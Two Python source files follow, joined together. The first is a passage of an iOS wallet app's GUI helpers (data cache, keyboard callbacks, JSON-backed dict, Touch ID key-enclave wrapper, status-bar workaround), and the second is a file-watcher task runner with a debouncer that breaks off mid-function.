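# Illustrative sketch (not executed): namedtuples are immutable, so this returns a modified copy.
# The Point type below is hypothetical.
#
#   Point = namedtuple('Point', 'x y')
#   p1 = Point(1, 2)
#   p2 = set_namedtuple_field(p1, 'y', 5)   # p1 is unchanged; p2 == Point(x=1, y=5)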
#########################################################################################################
# Data Manager -- domain based data cache -- uses this app's PySig mechanism to announce interested #
# subsystems about data updates. Used by tx history (and other app mechanisms). Instances live in #
# the gui.ElectrumGui instance. .emit() implicitly empties the cache. emptyCache() implicitly emits. #
#########################################################################################################
class DataMgr(PySig):
def __init__(self):
super().__init__()
        #self.clear() # not needed: super().__init__() already calls clear(), which dispatches to this subclass's clear(), which in turn calls super().clear() -- a Python inheritance quirk
def clear(self):
super().clear()
self.datas = dict()
def keyify(self, key: Any) -> Any:
if isinstance(key, (list,tuple,dict,set)):
key = str(key)
return key
def get(self, realkey : Any) -> Any:
key = self.keyify(realkey)
if key not in self.datas:
#print("DataMgr: cache miss for domain (%s), calling doReload"%(str(key)))
self.datas[key] = self.doReloadForKey(realkey)
else:
pass
#print("DataMgr: cache HIT for domain (%s)"%(str(key)))
return self.datas.get(key, None)
def emptyCache(self, noEmit : bool = False, require_sync : bool = False, *args) -> None:
self.datas = dict()
if not noEmit:
            super().emit_common(require_sync, *args)
def emit_common(self, require_sync : bool, *args) -> None:
        self.emptyCache(False, require_sync, *args)
def doReloadForKey(self, key : Any) -> Any:
NSLog("DataMgr: UNIMPLEMENTED -- doReloadForKey() needs to be overridden in a child class!")
return None
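# Illustrative sketch (not executed): a DataMgr subclass only needs to override doReloadForKey().
# get() caches per key; emit()/emptyCache() flush the cache and notify connected slots.
# The class and loader below (HistoryMgr, expensive_history_lookup) are hypothetical.
#
#   class HistoryMgr(DataMgr):
#       def doReloadForKey(self, key):
#           return expensive_history_lookup(key)   # hypothetical loader
#
#   mgr = HistoryMgr()
#   mgr.connect(lambda: print("history data changed"))
#   hist = mgr.get('default_wallet')   # cache miss -> doReloadForKey; subsequent calls hit the cache
#   mgr.emit()                         # empties the cache and notifies slots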
######
### Various helpers for laying out text, building attributed strings, etc...
######
_f1 = UIFont.systemFontOfSize_weight_(16.0,UIFontWeightBold).retain()
_f2 = UIFont.systemFontOfSize_weight_(11.0,UIFontWeightBold).retain()
_f2_ipad = UIFont.systemFontOfSize_weight_(14.0,UIFontWeightSemibold).retain()
_f3 = UIFont.systemFontOfSize_weight_(1.0,UIFontWeightThin).retain()
_f4 = UIFont.systemFontOfSize_weight_(14.0,UIFontWeightLight).retain()
_s3 = ns_from_py(' ').sizeWithAttributes_({NSFontAttributeName:_f3})
_kern = -0.5 # kerning for some of the text labels in some of the views (in points). Despite having given this an underscore name, other files in this package refer to this symbol. ;)
def stripAmount(s : str) -> str:
return s.translate({ord(i):None for i in '+- '}) #strip +/-
def makeFancyDateAttrString(datestr : str, font : ObjCInstance = None) -> ObjCInstance:
''' Make the ending MM:SS of the date field be 'light' text as per Max's UI spec '''
if font is None: font = _f4
if datestr: datestr = datestr.translate({ord('-') : '.'}) # replace hyphens in date with '.' chars as per Max's recommendations
ats = NSMutableAttributedString.alloc().initWithString_(datestr).autorelease()
l = len(datestr)
ix = datestr.rfind(' ', 0, l)
if ix >= 0:
r = NSRange(ix,l-ix)
ats.addAttribute_value_range_(NSFontAttributeName,font,r)
return ats
def hackyFiatAmtAttrStr(amtStr : str, fiatStr : str, ccy : str, pad : float, color : ObjCInstance = None, cb : Callable = None, kern : float = None, amtColor = None, isIpad = False) -> ObjCInstance:
#print("str=",amtStr,"pad=",pad,"spacesize=",_s3.width)
p = ''
if fiatStr:
if pad > 0.0:
n = round(pad / _s3.width)
p = ''.join([' ' for i in range(0, n)])
fiatStr = p + ' ' + fiatStr + ' ' + ccy
else:
fiatStr = ''
ats = NSMutableAttributedString.alloc().initWithString_(amtStr + fiatStr).autorelease()
rAmt = NSRange(0,len(amtStr))
ats.addAttribute_value_range_(NSFontAttributeName,_f1,rAmt)
if amtColor: ats.addAttribute_value_range_(NSForegroundColorAttributeName,amtColor,rAmt)
if fiatStr:
if callable(cb): cb()
r0 = NSRange(len(amtStr),len(p))
ats.addAttribute_value_range_(NSFontAttributeName,_f3,r0)
r = NSRange(len(amtStr)+len(p),len(fiatStr)-len(p))
r2 = NSRange(ats.length()-(len(ccy)+1),len(ccy))
ats.addAttribute_value_range_(NSFontAttributeName,_f2 if not isIpad else _f2_ipad,r)
if kern: ats.addAttribute_value_range_(NSKernAttributeName,kern,r)
#ats.addAttribute_value_range_(NSBaselineOffsetAttributeName,3.0,r)
if color:
ats.addAttribute_value_range_(NSForegroundColorAttributeName,color,r)
#ats.addAttribute_value_range_(NSFontAttributeName,_f3,r2)
#ats.addAttribute_value_range_(NSObliquenessAttributeName,0.1,r)
#ps = NSMutableParagraphStyle.new().autorelease()
#ps.setParagraphStyle_(NSParagraphStyle.defaultParagraphStyle)
#ps.alignment = NSJustifiedTextAlignment
#ps.lineBreakMode = NSLineBreakByWordWrapping
#ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
return ats
###############################################################################
# Facility to register python callbacks for when the keyboard is shown/hidden #
###############################################################################
_kbcb_idx = 0
_kbcb_dict = dict()
_kbcb_Entry = namedtuple('_kbcb_Entry', 'handle view obs handler onWillHide onWillShow onDidHide onDidShow')
class UTILSKBCBHandler(NSObject):
handle = objc_property()
@objc_method
def dealloc(self) -> None:
self.handle = None
send_super(__class__, self, 'dealloc')
@objc_method
def willHide_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if entry and entry.onWillHide: entry.onWillHide()
@objc_method
def didHide_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if entry and entry.onDidHide: entry.onDidHide()
@objc_method
def willShow_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if not entry: return
rect = py_from_ns(sender.userInfo)[str(UIKeyboardFrameEndUserInfoKey)].CGRectValue
window = entry.view.window()
if window: rect = entry.view.convertRect_fromView_(rect, window)
if entry.onWillShow: entry.onWillShow(rect)
@objc_method
def didShow_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if not entry: return
rect = py_from_ns(sender.userInfo)[str(UIKeyboardFrameEndUserInfoKey)].CGRectValue
window = entry.view.window()
if window: rect = entry.view.convertRect_fromView_(rect, window)
if entry.onDidShow: entry.onDidShow(rect)
# it's safe to never unregister, as an objc associated object will be created for the view in question and will clean everything up on
# view dealloc. The '*Hide' callbacks should take 0 arguments, the '*Show' callbacks take 1, a CGRect of the keyboard in the destination view's coordinates
def register_keyboard_callbacks(view : ObjCInstance, onWillHide = None, onWillShow = None, onDidHide = None, onDidShow = None) -> int:
    if not any([onWillHide, onWillShow, onDidHide, onDidShow]) or not view or not isinstance(view, UIView):
NSLog("WARNING: register_keyboard_callbacks: need at least one callback specified, as well as non-null view! Will return early!")
return 0
global _kbcb_idx
_kbcb_idx += 1
handle = _kbcb_idx
obs = NSDeallocObserver(view)
handler = UTILSKBCBHandler.new()
handler.handle = handle
entry = _kbcb_Entry(handle, view, obs, handler, onWillHide, onWillShow, onDidHide, onDidShow)
if entry.onWillHide: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('willHide:'),UIKeyboardWillHideNotification,None)
if entry.onWillShow: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('willShow:'),UIKeyboardWillShowNotification,None)
if entry.onDidHide: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('didHide:'),UIKeyboardDidHideNotification,None)
if entry.onDidShow: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('didShow:'),UIKeyboardDidShowNotification,None)
_kbcb_dict[handle] = entry
obs.connect(lambda x: unregister_keyboard_callbacks(handle))
return handle
# Unless you call this, the keyboard callback will stay alive until the target view is dealloc'd, at which time all resources
# WILL be cleaned up. This function is provided in case you want to stop observing the keyboard hide/show events early.
def unregister_keyboard_callbacks(handle : int) -> None:
entry = None
if isinstance(handle, int): entry = _kbcb_dict.pop(handle, None)
if entry:
if entry.onWillHide: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardWillHideNotification,None)
if entry.onWillShow: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardWillShowNotification,None)
if entry.onDidHide: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardDidHideNotification,None)
if entry.onDidShow: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardDidShowNotification,None)
entry.obs.disconnect()
entry.obs.dissociate()
entry.handler.release()
else:
NSLog("*** WARNING: unregister_keyboard_callbacks could not find handle %d!", handle)
# boilerplate code below to auto-scroll textfields/textviews when keyboard shown. Install this in viewWillAppear.
def register_keyboard_autoscroll(sv : UIScrollView) -> int:
if not isinstance(sv, UIScrollView):
NSLog("*** WARNING: register_keyboard_autoscroll called but it wasn't passed a UIScrollView. Ignoring!")
return None
def kbShow(r : CGRect) -> None:
resp = UIResponder.currentFirstResponder()
window = sv.window()
if resp and isinstance(resp, UIView) and window and resp.window():
#r = sv.convertRect_toView_(r, window)
visible = sv.convertRect_toView_(sv.bounds, window)
visible.size.height -= r.size.height
respFrame = resp.convertRect_toView_(resp.bounds, window)
origin = respFrame.origin
bottomLeft = CGPoint(origin.x, origin.y+respFrame.size.height)
diff = None
if not CGRectContainsPoint(visible, bottomLeft) and (is_portrait() or is_ipad()):
diff = (bottomLeft.y - (visible.origin.y+visible.size.height)) + 25.0
elif not CGRectContainsPoint(visible, origin):
diff = origin.y - visible.origin.y - 25.0
if diff:
'''
def fmt(x):
if isinstance(x, CGRect):
return "%f,%f,%f,%f"%(x.origin.x,x.origin.y,x.size.width,x.size.height)
elif isinstance(x, CGPoint):
return "%f,%f"%(x.x,x.y)
else:
return str(x)
print("window",fmt(window.bounds),"origin",fmt(origin),"bottomLeft",fmt(bottomLeft),"respFrame",fmt(respFrame),"visible",fmt(visible),"contentOffset",fmt(sv.contentOffset))
'''
scrollPoint = CGPoint(0.0, sv.contentOffset.y + diff)#origin.y - visible.size.height + respFrame.size.height + 10)
sv.setContentOffset_animated_(scrollPoint, True)
#def kbHide() -> None:
# #sv.setContentOffset_animated_(CGPoint(0,0), True)
# pass
return register_keyboard_callbacks(sv, onWillShow = kbShow)#, onDidHide = kbHide)
# be sure to unregister the autoscroller when view disappears. Install unregister call in viewWillDisappear.
def unregister_keyboard_autoscroll(handle : int) -> None:
unregister_keyboard_callbacks(handle)
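# Illustrative sketch (not executed): pair registration and unregistration with the view lifecycle,
# as the comments above suggest. 'someScrollView' and 'handle' are hypothetical.
#
#   handle = register_keyboard_autoscroll(someScrollView)   # e.g. in your view controller's viewWillAppear
#   # ... the scroll view now auto-scrolls the first responder above the keyboard ...
#   unregister_keyboard_autoscroll(handle)                  # e.g. in viewWillDisappear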
##### File Backed Dict
class FileBackedDict(object):
def __init__(self, fileName : str, other : object = None):
self._d = dict()
self._fn = fileName
if isinstance(other, FileBackedDict):
self._d = other._d.copy()
if self.write():
NSLog("File-backed dict '%s' created as copy of '%s'",os.path.split(self._fn)[-1],os.path.split(other._fn)[-1])
else:
if os.path.exists(self._fn): self.read()
else: NSLog("New empty file-backed dict '%s' -- will create file once data is added.",os.path.split(self._fn)[-1])
def read(self) -> bool:
if not os.path.exists(self._fn):
NSLog("*** WARNING: JSON dict file does not (yet?) exist: %s", self._fn)
return False
try:
with open(self._fn, "r") as f:
result = json.load(f)
except:
NSLog("*** WARNING: Cannot read JSON dict file (%s) exception was: %s", self._fn, str(sys.exc_info()[1]))
return False
if not isinstance(result, dict):
NSLog("*** WARNING: JSON file read but is not a dict: %s", self._fn)
return False
self._d = result
return True
def write(self) -> bool:
try:
with open(self._fn, "w") as f:
json.dump(self._d, f, indent=4)
os.chmod(self._fn, stat.S_IREAD | stat.S_IWRITE)
except:
NSLog("*** WARNING: Cannot write JSON dict file (%s) exception was: %s", self._fn, str(sys.exc_info()[1]))
return False
return True
def dict(self) -> dict:
return self._d
def get(self, key : Any, default : Any = None) -> Any:
return self._d.get(key, default)
def set(self, key : Any, value : Any, save : bool = True) -> None:
self._d[key] = value
if save: self.write()
def has(self, key : Any) -> bool:
return bool(key in self._d)
def pop(self, key : Any, save : bool = True) -> Any:
if not isinstance(save, bool):
NSLog("*** WARNING: FileBackedDict's pop() method doesn't take a default value. The second argument is always the 'save' arg!")
ret = self._d.pop(key, None)
if save: self.write()
return ret
def clearAll(self, save : bool = True) -> None:
self._d = dict()
if save: self.write()
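# Illustrative sketch (not executed): FileBackedDict persists a plain dict as pretty-printed JSON.
# The path below is hypothetical.
#
#   prefs = FileBackedDict(os.path.join(some_data_dir, 'prefs.json'))
#   prefs.set('last_tab', 'history')        # writes the file immediately (save=True by default)
#   tab = prefs.get('last_tab', 'send')
#   prefs.pop('last_tab')                   # note: the 2nd positional arg is 'save', not a default value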
##### Wrapper for iOS Secure key enclave -- instantiates a KeyInterface class on the Objective C side. Note this requires TouchID/FaceID
class SecureKeyEnclave:
instances = 0
def __init__(self, keyDomain : str):
self._keyInterface = KeyInterface.keyInterfaceWithPublicKeyName_privateKeyName_(keyDomain + ".pubkey", keyDomain + ".privkey").retain()
SecureKeyEnclave.instances += 1
self.lastErrorCode = 0
#NSLog("SecureKeyEnclave: instance created (%d total extant instances)",SecureKeyEnclave.instances)
def __del__(self):
try:
if self._keyInterface:
self._keyInterface.release()
self._keyInterface = None
SecureKeyEnclave.instances -= 1
NSLog("SecureKeyEnclave: instance deleted (%d total instances left)",SecureKeyEnclave.instances)
except:
pass
def biometrics_available(self) -> bool:
return self._keyInterface.biometricsAreAvailable
def biometrics_are_not_available_reason(self) -> str: # returns failure reason if unavailable, or '' if available
err = objc_id(0)
self.lastErrorCode = 0
if not self._keyInterface.biometricsAreAvailableWithError_(byref(err)):
if err and err.value:
err = ObjCInstance(err)
self.lastErrorCode = err.code
return str(err.description)
else:
return 'Unknown Reason'
return ''
def has_keys(self) -> bool:
return bool(self._keyInterface.publicKeyExists)
def delete_keys(self) -> bool:
return self._keyInterface.deleteKeyPair()
    # Asynchronously generates the private/public keypair. Touch ID doesn't normally come up when this is called,
    # but it may. The completion is called on success or error; on error the first arg is False and the second arg may be an iOS error string.
def generate_keys(self, completion : Callable[[bool,str],None] = None) -> None:
self.lastErrorCode = 0
if self._keyInterface.publicKeyExists:
if callable(completion):
completion(True,'')
return
def Compl(b : bool, e : objc_id) -> None:
errStr = ''
if e and e.value:
e = ObjCInstance(e)
self.lastErrorCode = e.code
errStr = str(e.description)
if callable(completion): completion(bool(b), errStr)
self._keyInterface.generateTouchIDKeyPairWithCompletion_(Compl)
def encrypt_data(self, data : bytes) -> bytes:
if isinstance(data, str): data = data.encode('utf-8')
if not isinstance(data, bytes): raise ValueError('SecureKeyEnclave.encrypt_data requires a bytes argument!')
plainText = NSData.dataWithBytes_length_(data,len(data))
self.lastErrorCode = 0
err = objc_id(0)
cypherText = self._keyInterface.encryptData_error_(plainText, byref(err))
if not cypherText:
e = ''
if err and err.value:
err = ObjCInstance(err)
e = str(err.description)
self.lastErrorCode = err.code
NSLog("SecureKeyEnclave encrypt data failed with (Code=%d) error: %s", self.lastErrorCode, e)
return None
return bytes((c_ubyte * cypherText.length).from_address(cypherText.bytes))
# input: any plaintext string. output: a hex representation of the encrypted cyphertext data eg 'ff80be3376ff..'
def encrypt_str2hex(self, plainText : str) -> str:
b = self.encrypt_data(plainText)
if b is not None:
import binascii
return binascii.hexlify(b).decode('utf-8')
return None
# the inverse of the above. input: a hex string, eg 'ff80be3376...', callback is called with (plainText:str, error:str) as args
def decrypt_hex2str(self, hexdata : str, completion : Callable[[str,str],None], prompt : str = None) -> None:
if not callable(completion):
raise ValueError('A completion function is required as the second argument to this function!')
import binascii
cypherBytes = binascii.unhexlify(hexdata)
def MyCompl(pt : bytes, error : str) -> None:
plainText = pt.decode('utf-8', errors='ignore') if pt is not None else None
completion(plainText, error)
self.decrypt_data(cypherBytes, MyCompl, prompt = prompt)
    # May pop up a Touch ID prompt, which the user may cancel. If Touch ID is not available, or the user cancels, the completion is called
    # with (None, errStr) as args (errStr comes from iOS and is pretty arcane).
# Otherwise completion is called with the plainText bytes as first argument on success.
def decrypt_data(self, data : bytes, completion : Callable[[bytes,str],None], prompt : str = None) -> None:
self.lastErrorCode = 0
if not callable(completion):
raise ValueError('A completion function is required as the second argument to this function!')
if not prompt: prompt = _("Authenticate, please")
if isinstance(data, str): data = data.encode('utf-8')
if not isinstance(data, bytes): raise ValueError('A bytes or str object is required as the first argument to this function!')
cypherText = NSData.dataWithBytes_length_(data, len(data))
def Compl(dptr : objc_id, eptr : objc_id) -> None:
plainText = ObjCInstance(dptr) if dptr and dptr.value else None
error = None
if eptr and eptr.value:
e = ObjCInstance(eptr)
error = e.description
self.lastErrorCode = e.code
if plainText:
plainText = bytes((c_ubyte * plainText.length).from_address(plainText.bytes))
completion(plainText, error)
self._keyInterface.prompt = prompt
self._keyInterface.decryptData_completion_(cypherText, Compl)
'''
@classmethod
def DoTests(cls, bundleId : str, doDelete : bool = False) -> None:
keyEnclave = cls(bundleId)
print("BioMetricsAvail:",keyEnclave.biometrics_available())
print("BioMetricsNotAvailReason:",keyEnclave.biometrics_are_not_available_reason())
if doDelete:
keyEnclave.delete_keys()
print("Deleted All Keys")
pt = b'The quick brown fox jumped over the lazy dogs!!\0\0'
ptstr = pt.decode('utf-8')
def DataDecrypted(pts : str, error : str) -> None:
if pts is None:
print("Got decryption error", error)
else:
print("decrypted data was [",pts.encode('utf-8'),"]","compare =", pts==ptstr)
def DoEnc() -> None:
c = keyEnclave.encrypt_str2hex(ptstr)
if c is not None:
print("cypherText=",c)
keyEnclave.decrypt_hex2str(c,DataDecrypted)
else:
print("CypherText was NONE...!")
def KeysGenerated(b : bool, e : str) -> None:
print("Keys generated:",b,e)
if b: DoEnc()
if not keyEnclave.has_keys():
keyEnclave.generate_keys(KeysGenerated)
else:
DoEnc()
def Cleaner() -> None:
# keep a ref around for 10s then delete object.
nonlocal keyEnclave
keyEnclave = None
call_later(10.0, Cleaner)
'''
##### Boilerplate crap
class boilerplate:
    # iOS weirdness: buttons don't always flash to the highlighted state on tap, so we force it using this hack.
@staticmethod
def vc_highlight_button_then_do(vc : UIViewController, but : UIButton, func : Callable[[],None]) -> None:
if not but or not vc:
# Defensive programming...
func()
return
#if not isinstance(vc, UIViewController) or not isinstance(but, UIButton) or not callable(func):
# raise ValueError('One of the arguments passed to vc_highlight_button_then_do is invalid!')
but.retain()
call_later(0.030, lambda: but.setHighlighted_(True))
call_later(0.3, lambda: but.autorelease().setHighlighted_(False))
vc.retain()
call_later(0.1, lambda: vc.autorelease().viewIfLoaded and func())
# Layout constraint stuff.. programatically
@staticmethod
def layout_peg_view_to_superview(view : UIView) -> None:
if not view.superview():
NSLog("Warning: layout_peg_view_to_superview -- passed-in view lacks a superview!")
return
sv = view.superview()
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeCenterX, NSLayoutRelationEqual, view, NSLayoutAttributeCenterX, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeCenterY, NSLayoutRelationEqual, view, NSLayoutAttributeCenterY, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeHeight, NSLayoutRelationEqual, view, NSLayoutAttributeHeight, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeWidth, NSLayoutRelationEqual, view, NSLayoutAttributeWidth, 1.0, 0.0 ))
@staticmethod
def create_and_add_blur_view(parent : UIView, effectStyle = UIBlurEffectStyleRegular) -> UIView:
blurView = None
if parent:
effect = UIBlurEffect.effectWithStyle_(effectStyle)
blurView = UIVisualEffectView.alloc().initWithEffect_(effect).autorelease()
blurView.frame = parent.frame
parent.addSubview_(blurView)
return blurView
###
### iOS13 Status Bar Workaround stuff
###
class ios13_status_bar_workaround:
''' iOS 13.0+ introduced a new "bug" where the top status bar produced by
iOS cannot be covered by our popup notification. As a result, if on iOS 13+
and on non-iPhoneX, we must hide the iOS built-in status bar otherwise our
"Downloading headers..." status notification gets garbled and intermixed
with the iOS status bar. On iPhone X or above, the status bar from iOS is in
the notch area, and we avoid that area, so we don't need this workaround for
latest phones. Just iPhone 4, 5, 6, 7, & 8.
Use cls.push() when presenting a new notification and cls.pop()
when it is dismissed.
When the first notification is presented, the status bar will be hidden.
When the last notification is dismissed, the status bar will be shown again.
Note this mechanism violates encapsulation and accesses the
ElectrumWindow.gui.window instance to modify the window geometry. '''
# - PRIVATE
_lock = threading.Lock()
_ctr = 0
_needs_workaround = None
_application = None
def noop_if_not_needed(func):
def wrapper(*args, **kwargs):
cls = (args and args[0]) or __class__
cls._chk_init_cache_values()
if not cls._needs_workaround:
return
return func(*args, **kwargs)
return wrapper
# + PUBLIC Helpers
@staticmethod
def does_status_bar_clash_with_notifications() -> bool:
        ''' Returns True iff we are on iOS 13.0+ and not on an iPhone X
        (in that case we need to do the workaround). Returns False otherwise. '''
try:
return bool(ios_version_tuple()[0] >= 13 and not is_iphoneX())
except Exception as e:
print("ERROR trying to figure out if we should hide the status bar:", repr(e))
return True
@staticmethod
def is_workaround_possible() -> bool:
''' Returns True iff iPhone, False otherwise. '''
return not is_ipad()
# + PUBLIC INTERFACE
@classmethod
def appdelegate_hook(cls, appdelegate : ObjCInstance, application : ObjCInstance) -> None:
''' Hook intended to be called from the `application:willFinishLaunchingWithOptions:`
UIApplicationDelegate method. Basically all it does is unconditionally
        hide the status bar if on an iPad running iOS >= 13.0; otherwise it
        is essentially a no-op. '''
cls._application = application # cache singleton now while we're at it
if (cls.does_status_bar_clash_with_notifications()
and not cls.is_workaround_possible()):
# on iPad we just hide the status bar permanently. If they want to
# see it they can always put the app in a window then it will be
# visible.
application.setStatusBarHidden_(True)
@classmethod
@noop_if_not_needed
def push(cls):
with cls._lock:
if not cls._ctr:
# latch the status bar as hidden when _ctr is 0
cls._status_bar_hide()
cls._ctr += 1
return cls._ctr
@classmethod
@noop_if_not_needed
def pop(cls):
with cls._lock:
if cls._ctr <= 1:
# latch the status bar as visible when the _ctr hits 0
cls._status_bar_unhide()
cls._ctr = 0
else:
cls._ctr -= 1
@classmethod
@noop_if_not_needed
def on_rotated(cls):
with cls._lock:
if not cls._ctr:
return
# at this point we know a notification is up, so readjust our window
# (note that the window only readjusts if we are in portrait mode)
cls._status_bar_hide()
# - PRIVATE
@classmethod
def _chk_init_cache_values(cls):
# cache some values
if cls._needs_workaround is None:
cls._needs_workaround = cls.does_status_bar_clash_with_notifications() and cls.is_workaround_possible()
if cls._application is None:
cls._application = UIApplication.sharedApplication
@classmethod
def _status_bar_hide(cls):
''' latch the status bar off '''
def sb_height():
s = cls._application.statusBarFrame.size
return min(s.width, s.height)
sb_height_was = sb_height() # save current status bar height for adjustment below...
cls._application.setStatusBarHidden_(True)
from . import gui
g = gui.ElectrumGui.gui
if g and g.window:
g.window.frame = r = UIScreen.mainScreen.bounds # this breaks on iPad in windowed mode.... TODO: FIX!
# Move window down so it doesn't glitch up after we hid the status bar
# Note that `sb_height_was` may be 0 if we didn't have a status bar
# visible (ie we are in landscape mode).
r.origin.y += sb_height_was
r.size.height -= sb_height_was
g.window.frame = r
@classmethod
def _status_bar_unhide(cls):
''' latch the status bar on '''
cls._application.setStatusBarHidden_(False)
        # if we were in portrait mode, hiding the status bar changed the usable area... adjust the window back
from . import gui
g = gui.ElectrumGui.gui
if g and g.window:
# restore window to its full position.. at this point
# mainScreen.bounds is under the status bar (if visible)
g.window.frame = UIScreen.mainScreen.bounds # this breaks on iPad in windowed mode.... TODO: FIX!
#/end ios13_status_bar_workaround
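# Illustrative sketch (not executed): the workaround is reference counted, so nest push/pop around
# each presented notification; only the outermost pair actually toggles the iOS status bar.
#
#   ios13_status_bar_workaround.push()     # first notification appears -> status bar hidden
#   # ... show the popup notification ...
#   ios13_status_bar_workaround.pop()      # last notification dismissed -> status bar restored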
|
io_handler.py
|
# *-* encoding: utf-8
from __future__ import division, print_function
import logging
import datetime
import os
import sys
import subprocess
import threading
import time
from .colors import color, FG, BG, Style
from .config import ConfigError
logger = logging.getLogger(__name__)
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self):
super(StoppableThread, self).__init__()
self._stop_event = threading.Event()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
class Debouncer(object):
def __init__(self):
self.lock = threading.Lock()
self.status = None
self.thread = None
self.queued = None
self.trigger_time = None
# We cannot bind func/debounce_time to the thread function,
# because otherwise we couldn't update the func anymore during
# waiting.
self.func = None
self.debounce_time = None
def _thread_func(self):
while True:
# Note the sleep based implementation has the drawback that something
            # like this would behave a bit unexpectedly:
#
# debouncer.trigger(f, 1.0)
# time.sleep(0.001)
# debouncer.trigger(f, 0.001)
#
# After the first trigger we would sleep for an entire second, and even
# though the second trigger updates self.debounce_time, we cannot stop
# the ongoing sleep. Do we want to support this?
trigger_time_debounced = self.trigger_time + datetime.timedelta(seconds=self.debounce_time)
# print("trigger time: {}".format(self.trigger_time))
# print("trigger time debounced: {}".format(trigger_time_debounced))
now = datetime.datetime.now()
time_to_sleep = (trigger_time_debounced - now).total_seconds()
# print("time to sleep: {}".format(time_to_sleep))
if time_to_sleep > 0:
time.sleep(time_to_sleep)
else:
break
with self.lock:
self.status = "running"
logger.info(u"Task [---]: debounce wait finished, starting task")
self.func()
logger.info("Task [▴▴▴]: finished")
with self.lock:
if self.queued is None:
self.status = None
self.thread = None
else:
logger.info("Task [▾▾▾]: starting thread (from queued trigger)")
# unwrap / unset queued args
(func, debounce_time) = self.queued
self.queued = None
# update trigger
self.trigger_time = datetime.datetime.now()
# update args
self.func = func
self.debounce_time = debounce_time
# change status
self.status = "waiting"
self.thread = self._start_thread()
def trigger(self, func, debounce_time, enqueue):
with self.lock:
if self.status is None:
logger.info(u"Task [▾▾▾]: starting thread")
# update trigger
self.trigger_time = datetime.datetime.now()
# update args
self.func = func
self.debounce_time = debounce_time
# change status
self.status = "waiting"
self.thread = self._start_thread()
elif self.status == "waiting":
logger.info(u"Task [---]: debouncing event")
# update trigger
self.trigger_time = datetime.datetime.now()
# update args
self.func = func
self.debounce_time = debounce_time
# no status change
elif self.status == "running":
# update args (delayed)
if enqueue:
self.queued = (func, debounce_time)
logger.info("Task [---]: still in progress => queuing trigger")
else:
logger.info("Task [---]: still in progress => discarding trigger")
def _start_thread(self):
thread = threading.Thread(target=self._thread_func)
thread.start()
return thread
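# Illustrative sketch (not executed): triggers arriving within the debounce window only push the
# deadline forward; triggers arriving while the task runs are queued (at most one) or discarded.
# The callback below (rebuild) is hypothetical.
#
#   debouncer = Debouncer()
#   def rebuild(): print("rebuilding...")
#   debouncer.trigger(rebuild, 0.2, enqueue=True)   # starts the wait thread
#   debouncer.trigger(rebuild, 0.2, enqueue=True)   # arrives while waiting -> just resets the timer
#   # rebuild() runs once, roughly 0.2 s after the last trigger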
class ExecInfo(object):
def __init__(self, command, runtime, retcode):
self.command = command
self.runtime = runtime
self.retcode = retcode
class LaunchInfo(object):
def __init__(self, old_config, trigger, config_factory, on_task_finished):
self.old_config = old_config
self.trigger = trigger
self.config_factory = config_factory
self.on_task_finished = on_task_finished
class IOHandler(object):
"""
Helper class to handle asynchronous IO (running tasks, logging, event queuing).
"""
def __init__(self, working_dir):
self.working_dir = working_dir
self.debouncer = Debouncer()
def trigger(self, launch_info):
self.debouncer.trigger(
lambda: self._run_task(launch_info),
0.2, # TODO make configurable
launch_info.old_config.task.queue_events,
)
def _run_task(self, launch_info):
exec_infos = []
old_config = launch_info.old_config
if old_config.task.clear_screen:
self._clear_screen()
print(" * Trigger: {}".format(launch_info.trigger))
try:
config = launch_info.config_factory.load_config()
except ConfigError as e:
print(" * {}Error reloading config{}:\n{}".format(
color(FG.red),
color(),
e,
))
# Note: No config available, fallback to old config...
if old_config.sound:
self._notify_sound(success=False)
if old_config.notifications:
messages = ["Error reloading config:\n{}".format(e)]
self._notify_display(success=False, messages=messages)
return
for command in config.task.commands:
# additional newline to separate from task output
print(" * Running: {}{}{}\n".format(
color(FG.blue, style=Style.bold),
command,
color()
))
sys.stdout.flush()
t1 = time.time()
proc = subprocess.Popen(command, shell=True, cwd=self.working_dir)
retcode = proc.wait()
t2 = time.time()
exec_infos.append(ExecInfo(command, t2 - t1, retcode))
success = self._report_task_result(exec_infos)
if config.sound:
self._notify_sound(success)
if config.notifications:
messages = [
"'{}' took {:.1f} sec and returned {}.".format(e.command, e.runtime, e.retcode)
for e in exec_infos
]
self._notify_display(success, messages)
# Return re-loaded config to monitoring thread
launch_info.on_task_finished(config)
def _report_task_result(self, exec_infos):
# additional newline to separate from task output
print("\n * Task summary:")
success = True
for exec_info in exec_infos:
if exec_info.retcode == 0:
return_color = FG.green
else:
return_color = FG.red
success = False
print(" {}{}{} took {}{:.1f}{} sec and returned {}{}{}.".format(
color(FG.blue, style=Style.bold),
exec_info.command,
color(),
color(FG.yellow, style=Style.bold),
exec_info.runtime,
color(),
color(return_color, style=Style.bold),
exec_info.retcode,
color(),
))
print(" * Monitoring '{}' for changes... [Press <CTRL>+C to exit]".format(self.working_dir))
sys.stdout.flush()
return success
@staticmethod
def _notify_sound(success):
# TODO: make configurable
file_positive = "456581__bumpelsnake__nameit5.wav"
